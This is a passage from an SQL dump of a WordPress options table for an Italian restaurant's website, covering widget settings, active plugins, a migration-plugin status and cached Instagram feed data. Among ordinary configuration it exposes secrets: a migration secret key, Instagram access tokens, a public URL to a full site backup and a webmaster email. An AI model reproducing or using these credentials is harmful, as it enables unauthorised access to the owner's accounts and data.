panishLabel1\";s:0:\"\";s:13:\"ItalianLabel1\";s:0:\"\";s:18:\"contactProperties2\";s:0:\"\";s:17:\"propertyDataType2\";s:1:\"0\";s:13:\"EnglishLabel2\";s:0:\"\";s:12:\"FrenchLabel2\";s:0:\"\";s:12:\"GermanLabel2\";s:0:\"\";s:13:\"SpanishLabel2\";s:0:\"\";s:13:\"ItalianLabel2\";s:0:\"\";s:18:\"contactProperties3\";s:0:\"\";s:17:\"propertyDataType3\";s:1:\"0\";s:13:\"EnglishLabel3\";s:0:\"\";s:12:\"FrenchLabel3\";s:0:\"\";s:12:\"GermanLabel3\";s:0:\"\";s:13:\"SpanishLabel3\";s:0:\"\";s:13:\"ItalianLabel3\";s:0:\"\";s:18:\"contactProperties4\";s:0:\"\";s:17:\"propertyDataType4\";s:1:\"0\";s:13:\"EnglishLabel4\";s:0:\"\";s:12:\"FrenchLabel4\";s:0:\"\";s:12:\"GermanLabel4\";s:0:\"\";s:13:\"SpanishLabel4\";s:0:\"\";s:13:\"ItalianLabel4\";s:0:\"\";}s:6:\"French\";a:1:{s:9:\"thank_you\";i:0;}s:5:\"de_DE\";a:51:{s:17:\"language_checkbox\";b:0;s:5:\"title\";s:0:\"\";s:4:\"list\";s:1:\"0\";s:24:\"language_mandatory_email\";s:0:\"\";s:25:\"language_mandatory_button\";s:0:\"\";s:32:\"confirmation_email_message_input\";s:0:\"\";s:36:\"subscription_confirmed_message_input\";s:0:\"\";s:25:\"empty_email_message_input\";s:0:\"\";s:32:\"already_subscribed_message_input\";s:0:\"\";s:33:\"invalid_data_format_message_input\";s:0:\"\";s:37:\"generic_technical_error_message_input\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:19:\"email_content_title\";s:0:\"\";s:23:\"email_content_main_text\";s:0:\"\";s:28:\"email_content_confirm_button\";s:0:\"\";s:26:\"email_content_after_button\";s:0:\"\";s:18:\"contactProperties0\";s:0:\"\";s:17:\"propertyDataType0\";s:1:\"0\";s:13:\"EnglishLabel0\";s:0:\"\";s:12:\"FrenchLabel0\";s:0:\"\";s:12:\"GermanLabel0\";s:0:\"\";s:13:\"SpanishLabel0\";s:0:\"\";s:13:\"ItalianLabel0\";s:0:\"\";s:18:\"contactProperties1\";s:0:\"\";s:17:\"propertyDataType1\";s:1:\"0\";s:13:\"EnglishLabel1\";s:0:\"\";s:12:\"FrenchLabel1\";s:0:\"\";s:12:\"GermanLabel1\";s:0:\"\";s:13:\"SpanishLabel1\";s:0:\"\";s:13:\"ItalianLabel1\";s:0:\"\";s:18:\"contactProperties2\";s:0:\"\";s:17:\"propertyDataType2\";s:1:\"0\";s:13:\"EnglishLabel2\";s:0:\"\";s:12:\"FrenchLabel2\";s:0:\"\";s:12:\"GermanLabel2\";s:0:\"\";s:13:\"SpanishLabel2\";s:0:\"\";s:13:\"ItalianLabel2\";s:0:\"\";s:18:\"contactProperties3\";s:0:\"\";s:17:\"propertyDataType3\";s:1:\"0\";s:13:\"EnglishLabel3\";s:0:\"\";s:12:\"FrenchLabel3\";s:0:\"\";s:12:\"GermanLabel3\";s:0:\"\";s:13:\"SpanishLabel3\";s:0:\"\";s:13:\"ItalianLabel3\";s:0:\"\";s:18:\"contactProperties4\";s:0:\"\";s:17:\"propertyDataType4\";s:1:\"0\";s:13:\"EnglishLabel4\";s:0:\"\";s:12:\"FrenchLabel4\";s:0:\"\";s:12:\"GermanLabel4\";s:0:\"\";s:13:\"SpanishLabel4\";s:0:\"\";s:13:\"ItalianLabel4\";s:0:\"\";}s:6:\"German\";a:1:{s:9:\"thank_you\";i:0;}s:5:\"es_ES\";a:51:{s:17:\"language_checkbox\";b:0;s:5:\"title\";s:0:\"\";s:4:\"list\";s:1:\"0\";s:24:\"language_mandatory_email\";s:0:\"\";s:25:\"language_mandatory_button\";s:0:\"\";s:32:\"confirmation_email_message_input\";s:0:\"\";s:36:\"subscription_confirmed_message_input\";s:0:\"\";s:25:\"empty_email_message_input\";s:0:\"\";s:32:\"already_subscribed_message_input\";s:0:\"\";s:33:\"invalid_data_format_message_input\";s:0:\"\";s:37:\"generic_technical_error_message_input\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:19:\"email_content_title\";s:0:\"\";s:23:\"email_content_main_text\";s:0:\"\";s:28:\"email_content_confirm_button\";s:0:\"\";s:26:\"email_content_after_button\";s:0:\"\";s:18:\"contactProperties0\";s:0:\"\";s:17:\"propertyDataType0\";s:1:\"0\";s:13:\"EnglishLabel0\";s:0:\"\";s:12:\"FrenchLabel0\";s:0:\"\";s:12:\"GermanLabel0\";s:0:\"\";s:13:\"SpanishLabel0\";s:0:\"\";s:13:\"ItalianLabel0\";s:0:\"\";s:18:\"contactProperties1\";s:0:\"\";s:17:\"propertyDataType1\";s:1:\"0\";s:13:\"EnglishLabel1\";s:0:\"\";s:12:\"FrenchLabel1\";s:0:\"\";s:12:\"GermanLabel1\";s:0:\"\";s:13:\"SpanishLabel1\";s:0:\"\";s:13:\"ItalianLabel1\";s:0:\"\";s:18:\"contactProperties2\";s:0:\"\";s:17:\"propertyDataType2\";s:1:\"0\";s:13:\"EnglishLabel2\";s:0:\"\";s:12:\"FrenchLabel2\";s:0:\"\";s:12:\"GermanLabel2\";s:0:\"\";s:13:\"SpanishLabel2\";s:0:\"\";s:13:\"ItalianLabel2\";s:0:\"\";s:18:\"contactProperties3\";s:0:\"\";s:17:\"propertyDataType3\";s:1:\"0\";s:13:\"EnglishLabel3\";s:0:\"\";s:12:\"FrenchLabel3\";s:0:\"\";s:12:\"GermanLabel3\";s:0:\"\";s:13:\"SpanishLabel3\";s:0:\"\";s:13:\"ItalianLabel3\";s:0:\"\";s:18:\"contactProperties4\";s:0:\"\";s:17:\"propertyDataType4\";s:1:\"0\";s:13:\"EnglishLabel4\";s:0:\"\";s:12:\"FrenchLabel4\";s:0:\"\";s:12:\"GermanLabel4\";s:0:\"\";s:13:\"SpanishLabel4\";s:0:\"\";s:13:\"ItalianLabel4\";s:0:\"\";}s:7:\"Spanish\";a:1:{s:9:\"thank_you\";i:0;}s:5:\"it_IT\";a:51:{s:17:\"language_checkbox\";i:1;s:5:\"title\";s:25:\"Iscriviti alla Newsletter\";s:4:\"list\";s:5:\"22514\";s:24:\"language_mandatory_email\";s:0:\"\";s:25:\"language_mandatory_button\";s:0:\"\";s:32:\"confirmation_email_message_input\";s:0:\"\";s:36:\"subscription_confirmed_message_input\";s:0:\"\";s:25:\"empty_email_message_input\";s:0:\"\";s:32:\"already_subscribed_message_input\";s:0:\"\";s:33:\"invalid_data_format_message_input\";s:0:\"\";s:37:\"generic_technical_error_message_input\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:19:\"email_content_title\";s:0:\"\";s:23:\"email_content_main_text\";s:0:\"\";s:28:\"email_content_confirm_button\";s:0:\"\";s:26:\"email_content_after_button\";s:0:\"\";s:18:\"contactProperties0\";s:0:\"\";s:17:\"propertyDataType0\";s:1:\"0\";s:13:\"EnglishLabel0\";s:0:\"\";s:12:\"FrenchLabel0\";s:0:\"\";s:12:\"GermanLabel0\";s:0:\"\";s:13:\"SpanishLabel0\";s:0:\"\";s:13:\"ItalianLabel0\";s:0:\"\";s:18:\"contactProperties1\";s:0:\"\";s:17:\"propertyDataType1\";s:1:\"0\";s:13:\"EnglishLabel1\";s:0:\"\";s:12:\"FrenchLabel1\";s:0:\"\";s:12:\"GermanLabel1\";s:0:\"\";s:13:\"SpanishLabel1\";s:0:\"\";s:13:\"ItalianLabel1\";s:0:\"\";s:18:\"contactProperties2\";s:0:\"\";s:17:\"propertyDataType2\";s:1:\"0\";s:13:\"EnglishLabel2\";s:0:\"\";s:12:\"FrenchLabel2\";s:0:\"\";s:12:\"GermanLabel2\";s:0:\"\";s:13:\"SpanishLabel2\";s:0:\"\";s:13:\"ItalianLabel2\";s:0:\"\";s:18:\"contactProperties3\";s:0:\"\";s:17:\"propertyDataType3\";s:1:\"0\";s:13:\"EnglishLabel3\";s:0:\"\";s:12:\"FrenchLabel3\";s:0:\"\";s:12:\"GermanLabel3\";s:0:\"\";s:13:\"SpanishLabel3\";s:0:\"\";s:13:\"ItalianLabel3\";s:0:\"\";s:18:\"contactProperties4\";s:0:\"\";s:17:\"propertyDataType4\";s:1:\"0\";s:13:\"EnglishLabel4\";s:0:\"\";s:12:\"FrenchLabel4\";s:0:\"\";s:12:\"GermanLabel4\";s:0:\"\";s:13:\"SpanishLabel4\";s:0:\"\";s:13:\"ItalianLabel4\";s:0:\"\";}s:7:\"Italian\";a:1:{s:9:\"thank_you\";i:0;}}s:12:\"_multiwidget\";i:1;}','yes'),(71685,'active_plugins','a:28:{i:0;s:19:\"akismet/akismet.php\";i:1;s:20:\"attika-core/main.php\";i:2;s:47:\"attika-instagram-feed/attika-instagram-feed.php\";i:3;s:26:\"attika-restaurant/main.php\";i:4;s:43:\"attika-twitter-feed/attika-twitter-feed.php\";i:5;s:33:\"classic-editor/classic-editor.php\";i:6;s:39:\"column-shortcodes/column-shortcodes.php\";i:7;s:36:\"contact-form-7/wp-contact-form-7.php\";i:8;s:59:\"content-views-query-and-display-post-page/content-views.php\";i:9;s:31:\"envato-market/envato-market.php\";i:10;s:33:\"instagram-feed/instagram-feed.php\";i:11;s:55:\"iubenda-cookie-law-solution/iubenda_cookie_solution.php\";i:12;s:27:\"js_composer/js_composer.php\";i:13;s:27:\"maintenance/maintenance.php\";i:14;s:37:\"options-importer/options-importer.php\";i:15;s:23:\"page-list/page-list.php\";i:16;s:26:\"post-smtp/postman-smtp.php\";i:17;s:47:\"really-simple-captcha/really-simple-captcha.php\";i:18;s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";i:19;s:23:\"revslider/revslider.php\";i:20;s:27:\"updraftplus/updraftplus.php\";i:21;s:51:\"woo-stickers-by-webline/woo-stickers-by-webline.php\";i:22;s:59:\"woocommerce-direct-checkout/woocommerce-direct-checkout.php\";i:23;s:91:\"woocommerce-gateway-paypal-express-checkout/woocommerce-gateway-paypal-express-checkout.php\";i:24;s:65:\"woocommerce-ultimate-gift-card/woocommerce-ultimate-gift-card.php\";i:25;s:27:\"woocommerce/woocommerce.php\";i:26;s:24:\"wordpress-seo/wp-seo.php\";i:27;s:35:\"wp-fastest-cache/wpFastestCache.php\";}','yes'),(71686,'ai1wm_secret_key','91quFwHbPyHc','yes'),(71687,'template','attika','yes'),(71688,'stylesheet','attika','yes'),(71689,'jetpack_active_modules','a:0:{}','yes'),(71690,'ai1wm_status','a:2:{s:4:\"type\";s:8:\"download\";s:7:\"message\";s:358:\"<a href=\"https://www.ristorantesolymar.it/wp-content/ai1wm-backups/www.ristorantesolymar.it-20210128-144356-m1vty7.wpress\" class=\"ai1wm-button-green ai1wm-emphasize ai1wm-button-download\" title=\"www.ristorantesolymar.it\" download=\"www.ristorantesolymar.it-20210128-144356-m1vty7.wpress\"><span>Download www.ristorantesolymar.it</span><em>Size: 564 MB</em></a>\";}','yes'),(72201,'sbi_rating_notice','dismissed','yes'),(72202,'sb_instagram_settings','a:58:{s:15:\"sb_instagram_at\";s:0:\"\";s:20:\"sb_instagram_user_id\";a:1:{i:0;s:10:\"8526810189\";}s:30:\"sb_instagram_preserve_settings\";s:0:\"\";s:23:\"sb_instagram_cache_time\";s:1:\"1\";s:28:\"sb_instagram_cache_time_unit\";s:5:\"hours\";s:16:\"sbi_caching_type\";s:4:\"page\";s:23:\"sbi_cache_cron_interval\";s:7:\"12hours\";s:19:\"sbi_cache_cron_time\";s:1:\"1\";s:20:\"sbi_cache_cron_am_pm\";s:2:\"am\";s:18:\"sb_instagram_width\";i:100;s:23:\"sb_instagram_width_unit\";s:1:\"%\";s:28:\"sb_instagram_feed_width_resp\";s:0:\"\";s:19:\"sb_instagram_height\";s:0:\"\";s:16:\"sb_instagram_num\";i:20;s:24:\"sb_instagram_height_unit\";s:2:\"px\";s:17:\"sb_instagram_cols\";s:1:\"4\";s:27:\"sb_instagram_disable_mobile\";s:0:\"\";s:26:\"sb_instagram_image_padding\";i:5;s:31:\"sb_instagram_image_padding_unit\";s:2:\"px\";s:17:\"sb_instagram_sort\";s:4:\"none\";s:23:\"sb_instagram_background\";s:0:\"\";s:21:\"sb_instagram_show_btn\";b:1;s:27:\"sb_instagram_btn_background\";s:0:\"\";s:27:\"sb_instagram_btn_text_color\";s:0:\"\";s:21:\"sb_instagram_btn_text\";s:17:\"Carica di più...\";s:22:\"sb_instagram_image_res\";s:4:\"auto\";s:24:\"sb_instagram_show_header\";b:1;s:24:\"sb_instagram_header_size\";s:5:\"small\";s:25:\"sb_instagram_header_color\";s:0:\"\";s:23:\"sb_instagram_custom_bio\";s:0:\"\";s:26:\"sb_instagram_custom_avatar\";s:0:\"\";s:28:\"sb_instagram_show_follow_btn\";b:1;s:33:\"sb_instagram_folow_btn_background\";s:0:\"\";s:34:\"sb_instagram_follow_btn_text_color\";s:0:\"\";s:28:\"sb_instagram_follow_btn_text\";s:17:\"Seguire Instagram\";s:23:\"sb_instagram_custom_css\";s:0:\"\";s:22:\"sb_instagram_custom_js\";s:0:\"\";s:17:\"sb_instagram_cron\";s:2:\"no\";s:19:\"sb_instagram_backup\";s:2:\"on\";s:15:\"sb_ajax_initial\";b:0;s:24:\"enqueue_css_in_shortcode\";b:0;s:23:\"sb_instagram_ajax_theme\";s:2:\"on\";s:27:\"sb_instagram_disable_resize\";b:0;s:24:\"sb_instagram_favor_local\";b:0;s:19:\"sb_instagram_minnum\";i:0;s:24:\"disable_js_image_loading\";b:0;s:18:\"enqueue_js_in_head\";b:0;s:30:\"sb_instagram_disable_mob_swipe\";b:0;s:15:\"sbi_font_method\";s:3:\"svg\";s:28:\"sb_instagram_disable_awesome\";s:0:\"\";s:15:\"custom_template\";b:0;s:20:\"disable_admin_notice\";b:0;s:19:\"enable_email_report\";s:2:\"on\";s:18:\"email_notification\";s:6:\"monday\";s:28:\"email_notification_addresses\";s:25:\"webmaster@baldisserri.com\";s:9:\"check_api\";s:2:\"on\";s:18:\"connected_accounts\";a:1:{i:8526810189;a:7:{s:12:\"access_token\";s:69:\"8526810189.M2E4MWE5Zg==.NTU0OWM5NDQwNDY1.NDhjODg5YjY0ZTYzYjM2ZWIxOGE=\";s:7:\"user_id\";s:10:\"8526810189\";s:8:\"username\";s:16:\"solymar_riccione\";s:8:\"is_valid\";b:1;s:12:\"last_checked\";i:1538205579;s:15:\"profile_picture\";s:150:\"https://scontent.cdninstagram.com/vp/d656d8c98c18955cbcc5e4c838f0c16a/5C56D95A/t51.2885-19/s150x150/40022026_483330955515697_3524917434064568320_n.jpg\";s:12:\"local_avatar\";b:0;}}s:21:\"sb_instagram_show_bio\";s:2:\"on\";}','yes'),(72211,'!sbi_header_8526810189','{\"pagination\":{\"next_url\":[]},\"data\":{\"id\":\"8526810189\",\"username\":\"solymar.riccione\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/vp\\/7531995557e342d671b102fbfdcc6cbd\\/5E740A2E\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com\",\"full_name\":\"Ristorante sol y mar\",\"bio\":\"Dal 1994 con Passione Coerenza Materia Prima e Tecnica .Teo (Chef)e Barbara (sala)e ora anche  Mattia e Thomas, ad imparare il mestiere\",\"website\":\"http:\\/\\/www.ristorantesolymar.it\\/\",\"is_business\":true,\"counts\":{\"media\":219,\"follows\":53,\"followed_by\":889}},\"meta\":[]}','no'),(72214,'!sbi_8526810189','{\"pagination\":{\"next_url\":[\"https:\\/\\/api.instagram.com\\/v1\\/users\\/8526810189\\/media\\/recent?access_token=8526810189.3a81a9f.5549c944046548c889b64e63b36eb18a&count=33&max_id=2126836093643151669_8526810189\"]},\"data\":[{\"id\":\"2190729607283857837_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/vp\\/7531995557e342d671b102fbfdcc6cbd\\/5E740A2E\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/72143020_166235451148315_3891568810136618572_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=6e5b7e456e901603dfce854abdf99bd1&oe=5E8B7E4D\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/72143020_166235451148315_3891568810136618572_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=34146bdbdd4077847701057f42a0e387&oe=5E7959BD\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/72143020_166235451148315_3891568810136618572_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=03c509da51248ef30566ec304b6b7dc2&oe=5E7C4EEA\"}},\"created_time\":\"1575375341\",\"caption\":null,\"user_has_liked\":false,\"likes\":{\"count\":51},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":1},\"type\":\"carousel\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B5nCPiJFdmt\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[],\"carousel_media\":[{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/72143020_166235451148315_3891568810136618572_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=6e5b7e456e901603dfce854abdf99bd1&oe=5E8B7E4D\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/72143020_166235451148315_3891568810136618572_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=34146bdbdd4077847701057f42a0e387&oe=5E7959BD\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/72143020_166235451148315_3891568810136618572_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=03c509da51248ef30566ec304b6b7dc2&oe=5E7C4EEA\"}},\"users_in_photo\":[],\"type\":\"image\"},{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/71789887_486555042240877_3164199964924470696_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=40a0b35121db3483ce7e05f0cf0d4a25&oe=5E7D25F1\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/71789887_486555042240877_3164199964924470696_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=fc84c15e1ec53ac2caa0c4f59ec44c01&oe=5E88FF01\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/71789887_486555042240877_3164199964924470696_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=9990157cb0f10b2dcc7da4fd3b7c01d8&oe=5E6CA656\"}},\"users_in_photo\":[],\"type\":\"image\"}]},{\"id\":\"2173320503036812628_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/vp\\/7531995557e342d671b102fbfdcc6cbd\\/5E740A2E\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/72710262_1378646762309381_8312755117170529604_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=d7bb01b1ba2c29d2739fac116be2e27e&oe=5E7EB7B6\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/72710262_1378646762309381_8312755117170529604_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=1982de9b80be837ce2d4d5b976993f72&oe=5E888FCE\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/72710262_1378646762309381_8312755117170529604_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=f6322ad355f4a2910469f4454ba696e8&oe=5E69F133\"}},\"created_time\":\"1573300014\",\"caption\":null,\"user_has_liked\":false,\"likes\":{\"count\":35},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B4pL3uWlR1U\\/\",\"location\":{\"latitude\":44.023654,\"longitude\":12.6318005,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]},{\"id\":\"2170409798340038426_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/vp\\/7531995557e342d671b102fbfdcc6cbd\\/5E740A2E\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/75280944_430747167524047_6407736790677051141_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=a6c7d86d4c38b5288489ea31c9c47598&oe=5E7A9ECD\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/75280944_430747167524047_6407736790677051141_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=7a08ab7ed3afc38b21d18a633e7c0f53&oe=5E85B73D\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/75280944_430747167524047_6407736790677051141_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=f82155d8ba3b610638315733fa4a902f&oe=5E837F6A\"}},\"created_time\":\"1572953031\",\"caption\":null,\"user_has_liked\":false,\"likes\":{\"count\":42},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B4e2DZXFc8a\\/\",\"location\":{\"latitude\":44.023654,\"longitude\":12.6318005,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]},{\"id\":\"2169075034785953622_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/vp\\/7531995557e342d671b102fbfdcc6cbd\\/5E740A2E\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/71677835_434890850408728_984254079737674669_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=e36888706202da7069bde0708392de92&oe=5E705FFE\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/71677835_434890850408728_984254079737674669_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=b83f6fe5d31ce94d2c150cf507865cec&oe=5E81E0F3\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/71677835_434890850408728_984254079737674669_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=d7c504090dcc0463eac628fda42f64eb&oe=5E71FC1F\"}},\"created_time\":\"1572793915\",\"caption\":null,\"user_has_liked\":false,\"likes\":{\"count\":39},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B4aGkB7lbdW\\/\",\"location\":{\"latitude\":44.023654,\"longitude\":12.6318005,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]},{\"id\":\"2168959988818792416_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/vp\\/7531995557e342d671b102fbfdcc6cbd\\/5E740A2E\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/71140330_539422710154253_2959005628999474941_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=4db9e9ac0e4f438c84e51c83983068d9&oe=5E8CCE9D\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/71140330_539422710154253_2959005628999474941_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=b6504813e6a6ff4670d81aa62332ad0f&oe=5E80076D\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/71140330_539422710154253_2959005628999474941_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=2d7f8759f4c27879f7b66863de84035b&oe=5E8A443A\"}},\"created_time\":\"1572780201\",\"caption\":{\"id\":\"17849143969717772\",\"text\":\"Sunday\",\"created_time\":\"1572780201\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/vp\\/7531995557e342d671b102fbfdcc6cbd\\/5E740A2E\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":40},\"tags\":[],\"filter\":\"Inkwell\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B4ZsZ5BlE_g\\/\",\"location\":{\"latitude\":44.023654,\"longitude\":12.6318005,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]},{\"id\":\"2165507505589065277_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/vp\\/7531995557e342d671b102fbfdcc6cbd\\/5E740A2E\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/72669777_201603557517141_1438603051144595725_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=835256be954beb0dafe337c847a40011&oe=5E8B13E1\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/72669777_201603557517141_1438603051144595725_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=a7c37ddb69ca0daa560915536b336697&oe=5E7A6211\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/72669777_201603557517141_1438603051144595725_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=a8804c20f94636178b8f4aa5cdd9a1a7&oe=5E6D1246\"}},\"created_time\":\"1572368632\",\"caption\":{\"id\":\"17890667095424909\",\"text\":\"\\ud83d\\ude0d\",\"created_time\":\"1572368632\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y 